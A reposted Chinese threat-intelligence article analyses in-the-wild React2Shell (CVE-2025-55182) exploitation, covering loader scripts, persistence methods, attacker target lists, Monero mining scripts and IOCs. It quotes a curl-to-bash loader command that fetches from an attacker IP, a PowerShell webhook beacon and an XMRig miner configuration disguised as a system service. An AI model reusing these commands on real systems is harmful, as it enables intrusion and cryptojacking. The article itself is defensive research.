文章总结: React2Shell漏洞被广泛利用,攻击者使用多种脚本建立持久化访问,包括下载Node.js二进制文件、创建systemd服务和cron任务,并进行加密货币挖矿。研究发现超过700个主机已被感染,主要运行ZKWebServer。攻击者针对金融科技和食品饮料公司,并使用多个门罗币钱包地址。建议SOC环境纳入提供的IOC信息以检测相关活动。
综合评分: 86
文章分类: 漏洞分析,威胁情报,应急响应,WEB安全,红队
React2Shell 漏洞在野利用情况汇总
独眼情报
2025年12月12日 16:28
湖北
再也不想编辑技术文章了,即使简单的编辑头都大了。点点赞啊,兄弟萌!
分析人员在客户网络中观察到多起利用后活动。这些活动包括快速部署 Linux 加载器;通过 systemd、cron 和 rc.local 实现持久化;在隐藏目录中隐蔽安装 Node.js 和混淆的 JavaScript;使用公共云基础设施和多个指挥与控制(C2)服务器;存在网络发现的证据;以及通过诱饵令牌(Canarytoken)URL 和 webhook 进行的简单外传和遥测信标。
在检测到对 React2Shell 的利用后,多个可疑的 Windows 命令被执行(见图 1)。
图 1:通过 PowerShell 在 Windows 上执行的可疑利用后命令示例
在 Linux 上也观察到若干使用 /bin/sh 和 curl 的可疑命令(见图 2)。
图 2:在 Linux 上执行的可疑利用后命令示例
这些命令的模式是一致的。远程 shell 脚本或二进制文件被下载并执行,随后立即尝试清除任何攻击痕迹。对脚本分析显示至少包含四个关键组件,每个组件负责攻击的不同阶段。
1
第一个脚本(gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh)是一个多阶段恶意软件安装程序,用于在 Linux 系统上建立持久访问。执行后,它将一个合法的 Node.js 二进制文件下载到一个隐藏目录,然后部署两个 Base64 编码的有效载荷:一个加密的数据文件和一个强度混淆的 JavaScript 恶意软件。该 JavaScript 组件使用 AES-256-CBC 加密解密并执行其他有效载荷,生成一个分离的后台进程以维持持久性,并通过删除原始安装脚本来实施反取证措施。
2
第二个脚本(tsd.sh)通过在“/etc/cron.hourly/tsd”和“/etc/cron.hourly/tsd.sh”下创建条目来为名为“tsd”的组件实现持久化,并在可用时利用 systemd。如果 systemd 或 cron 无效,脚本会退回使用 rc.local。该脚本确保 tsd 始终运行,如果进程不存在则重启它,以确保主机能抵御简单的重启或进程终止。
3
第三个脚本(init.sh)是一个复杂的恶意软件部署工具,通过多重冗余机制建立持久的系统入侵。执行后,它会从一个 AWS S3 存储桶(hybird-accesskey-staging-saas[.]s3[.]dualstack[.]ap-northeast-1[.]amazonaws[.]com/agent)下载恶意二进制文件,将其安装到 /usr/infju/system_os,并通过同时安装 systemd 服务和基于 cron 的进程管理来建立持久性。该恶意软件伪装成合法的系统服务(system_os.service),具有自动重启功能。一个单独的 cron 任务每天午夜运行,强制重启该进程,即使该服务被手动停止也能确保其持续运行。脚本包含对 CentOS 和 Ubuntu 的操作系统检测,尝试通过 sudo 命令提升权限,并创建一个将所有重启活动记录到 /var/log/system_os_management.log. 的进程管理脚本。使用合法的系统目录、systemd 集成和多层持久化机制表明该脚本是一个专业开发的恶意软件投放器,旨在实现长期且有弹性的系统入侵。 该脚本含有大量中文注释,或采用了中文环境下的工具链。
4
第四个脚本(b.sh)在该生态系统中充当另一个加载器,通过 ‘/bin/sh -c $(curl -sfL hxxp://194[.]38[.]11[.]3:1790/b.sh | bash | gzip -n | base64 -w0)’ 获取。使用 curl | bash 加上压缩和编码表明威胁实施者意在限制在磁盘上创建痕迹,并可能试图绕过简单的内容检测。攻击者对类似 Canarytokens 的域发起了一系列 curl 和 nslookup 命令以确认漏洞利用成功(见图 3)。
图 3:攻击者针对 Canarytokens 域发起的命令
在 Windows 系统上,攻击者使用了简单的 webhook 信标:
C:\Windows\system32\cmd.exe /d /s /c "powershell -c "curl hxxps://webhook[.]site/xxxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx""
12 月 4 日,AssetNote 发布了一个名为”React2Shell 扫描器 “的公开工具 ,用于识别容易受到 React2Shell 漏洞攻击的未打补丁服务器。随后,这成为网络犯罪分子用来武装化和寻找潜在目标的必备工具。
在调查 React2Shell RCE 时,研究人员发现了一个开放目录,其中包含 CVE-2025–55182.yaml、domains.txt、script.sh 等工具。
- URL: http://154.61.77.105:8082/
- IP: 154.61.77.105
- 国家: 印度
- ASN: 135175
- 组织:Facts Online Pvt Ltd
本部分讨论了威胁参与者汇总的未来可能目标,这些目标被发现在文件名”next_target“中,由托管服务器中文件内的扫描工具引用。
已识别的开放目录
- 35,423 个域名在标题为” 域名 “的列表中
- 596 个 URL 在标题为” 下一个目标 “的文件列表中,包括星巴克、保时捷、lululemon等
即将公布的受害者名单摘录
注意 :这可以确认为威胁参与者的开放目录案例,因为列表中包含了已扫描的域名和即将到来的潜在目标 。
现在,让我们继续受害者映射,然后我们将回到攻击基础设施追踪。
CVE-2025–55182.YAML
以下是 React2Shell 漏洞的 POC 发布情况:-
在检查上述代码库时,发现了一个有趣的用例,即一个边界字符串 :WebKitFormBoundaryx8jO2oVc6SWP3Sad。这个边界字符串通常被中文 Shell 使用,但因 React2Shell 漏洞利用而臭名昭著。
注意 :multipart/form-data 边界字符串是浏览器生成的唯一标记,用于在 HTTP 文件上传请求中分隔各个部分(字段和文件)
寻找受害者
在扫描 CVE-2025–55182 YAML 文件中的参数时,发现了一个边界字符串”WebKitFormBoundaryx8jO2oVc6SWP3Sad“。值得注意的是,根据 FOFA 的扫描,在 708 个独特主机上也发现了相同的内容。
FOFA 结果
其中一个被感染的页面看起来像这样:-
被感染的主机
当我在 Censys 中查询相同的参数时,得到了 500 多个结果。
Censys 搜索结果
正如我们所看到的,出现了相同边界字符串的多个结果。由此可以得出结论,这些请求是由脚本、工具或自动化代理发送的,这些工具重复使用相同的硬编码边界(或重放捕获的请求),而正常浏览器在不同的页面加载或提交中从不重复使用同一边界。
同样有趣的是,大多数被识别的受害者都在运行服务器:ZK Web Server。
服务器详情
已识别的潜在目标
在检查下一个目标文件时,在此活动中发现了一些有价值的信息:
目标中有21家金融科技公司 目标中有 14 家食品饮料公司
一些目标包括 AI 公司、体育和娱乐等。以下是攻击者名单中与金融科技和食品饮料相关的公司列表:
FINTECH
=======
ACORNS
AFTERPAY
BINANCE
BITGO
BITPANDA
BLOCKCHAIN
BYBIT
CHIME
CLEARPAY
CLOVER
COINDESK
CONSENSYS
CURRENCYCLOUD
FISERV
KUCOIN
NUBANK
PIXPAY
SWAPCARD
SYFE
UPHOLD
ZOOP.BR
FOOD
====
BISTRO.SK
BLUEAPRON
IFOOD
JUST-EAT
KINDER
LIEFERANDO
STARBUCKS
TAKEAWAY
TASTY REWARDS
THINK GLOBAL HEALTH
TROUW
SMARTSHOP
SKIPTHEDISHES
ZAPKA
除此之外,还有其他公司被列出,如 Lululemon、保时捷、OpenAI 等。
本文末尾的受害者 IP 部分包含了完整的 IOC 信息。
攻击者基础设施追踪:SEX.SH
在追踪 React2Shell 漏洞时,我发现了一个常见的模式,其中一个名为 sex.sh 的文件被攻击者用于加密货币挖矿 (XMRIG),并与 React2Shell 漏洞一起使用。这已被多家安全公司(如 Data Dog 和 Huntress)记录在案。
在关注 sex.sh 后,我发现了几个存储该文件/配置的主机:-
177.84.130.195
209.141.49.251
185.126.82.162
212.69.85.41
45.13.227.97
45.153.34.41
196.251.66.201
38.85.206.203
217.60.248.193
16.16.83.161
40.113.172.145
54.178.19.122
209.141.49.251
68.178.168.171
52.252.226.14
180.210.220.54
这些是可能托管门罗币 (XMR) 挖矿以及 React2Shell 漏洞利用的 IP 地址。
以下是上述列出的 IP 地址的 WHOIS 详情。
WHOIS 查询
大多数地址被地理定位到不同的国家,因此使得它们成为独特的条目。只有 ASN8075 出现了两次。
以下是在 sex.sh 文件中找到的命令指令:
Sex.sh 中的命令
MD5: ddbbd528c3d0bcdd39617676c85dde33 活跃时间:2025年10月15日起 IP: 209.141.49.251
文件通讯
发现了多个 sex.sh 文件,上面的只是其中一个文件的示例。不同文件中的命令和代码各不相同。这将在接下来的部分中讨论。
NEXT.JS 应用中的 CVE-2025–55182
扫描 script.sh(来自开放目录)后,发现了以下命令:-
waybackurls $1 | grep “_next/static” | cut -d “/” -f1,2,3 | sort -u | uniq | tee -a next_target.txt
这是一条常见的单行命令,用于漏洞赏金猎取和网络应用侦察,通过从网络档案库(Wayback Machine)挖掘历史 URL 来发现目标潜在有趣的域名/子域名,这些域名/子域名正在运行 Next.js 应用程序。
Monero 挖矿(XMRIG):SEX.SH
在深入调查中,发现了多个”sex.sh”文件,其中包含不同的门罗币钱包。
多个加密挖矿文件
其中一个看起来像这样:-
代码内容
浅层解码
让我们解码上面代码片段中的一个4行命令,以确保我们真正理解它的作用:-
TAR_FILE="kal.tar.gz"
EXTRACT_DIR="xmrig-6.24.0"
SERVICE_NAME="system-update-service"
ARGS="--url pool.supportxmr.com:8080 --user 89Zr4vPaS8yTYRQE54tK1QGKRpsYZ6eJJYynfpfBf1zmLHECaskMPwd3wuTnQ4SYQ7QLkwVN8ur2QTQi9wkKMaCr2iXKa7j --pass sx --donate-level 0"
SERVICE_FILE="/etc/systemd/system/${SERVICE_NAME}.service"
让我们逐个分解每个参数:-
pool.supportxmr.com:8080 → A real, public Monero mining pool (SupportXMR)
Wallet address → 89Zr4vPaS8yTYRQE54tK1QGKRpsYZ6eJJYynfpfBf1zmLHECaskMPwd3wuTnQ4SYQ7QLkwVN8ur2QTQi9wkKMaCr2iXKa7j
Password: sx → Just a worker/rig identifier (sex.sh reference here)
--donate-level 0 → Disables XMRIG's built-in dev donation (normally 1%)
SERVICE_FILE="/etc/systemd/system/system-update-service.service"
This script creates a fake systemd service called “system-update-service” that runs the miner in the background and auto-starts on boot
这是一个恶意的 Linux 持久化脚本,常被加密货币挖矿僵尸网络使用。
XMR 钱包地址:REACT2SHELL 漏洞利用
在绘制漏洞利用和 XMR 挖矿活动的关联时,发现了 4 个门罗币钱包:-
8BWy7pgane96sLATF7nESM4ehZEtYAFNpYFAm88zftVsJ5jxFBdGVBrd1igptedXejfomPEpJvGUKU1etmkNBXmU5HkPR6e: http://40.113.172.145/EdgeConsulting/frontend/sex.sh
85UXW36JS78ZzZUw4XRJ1mHEsMAc6vHr2hBU7rvRv9y44Uk4Vo9fyq6LFDuckHZb2HTZpcYYaDdd73jS1oywAndGJxmKP9X: http://48.216.241.15/newsite/sex.sh.2
88tGYBwhWNzGesQs5QkwE1PdBa1tXGb9dcjxrdwujU3SEs3i7psaoJc4KmrDvv4VPTNtXazDWGkvGGfqurdBggvPEhZ43DJ: http://177.84.130.195/sex.sh
89Zr4vPaS8yTYRQE54tK1QGKRpsYZ6eJJYynfpfBf1zmLHECaskMPwd3wuTnQ4SYQ7QLkwVN8ur2QTQi9wkKMaCr2iXKa7j: http://177.84.130.195/sex.sh.2
可能存在更多与 React2Shell 漏洞利用无关的 Sex.sh 文件。这可以通过追踪目录中这些文件的修改/上传日期来确认。
注 :大多数 SEX.sh 文件上传/托管于 2025 年 12 月 5 日。然而,最早的文件可追溯至 2025 年 10 月,我们已在本研究的前面部分进行了介绍。
结论
本文讨论的 IOCs 应被纳入您的 SOC 环境中,以便潜在地标记任何来源或目的地为这些 IOCs 的流量。
这是一个定位具有加密挖矿活动和边界字符串记录的攻击者服务器的用例。一旦我们发现威胁行为者在利用 React2Shell 时使用的更多参数,这些也将被纳入本文中。
IoC(可能存在蜜罐的可能,自行分辨)
https://github.com/TheRavenFile/CVE-Intel/tree/main/REACT2SHELL
参考:
- https://news.sophos.com/en-us/2025/12/11/react2shell-flaw-cve-2025-55182-exploited-for-remote-code-execution/
- https://theravenfile.com/2025/12/12/react2shell-exploitation-in-the-wild/
打点小广告
感觉本号废了,一点推送都没有,那我自己给自己推送吧,喜欢看朋友圈的可以加下。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:独眼情报 《React2Shell 漏洞在野利用情况汇总》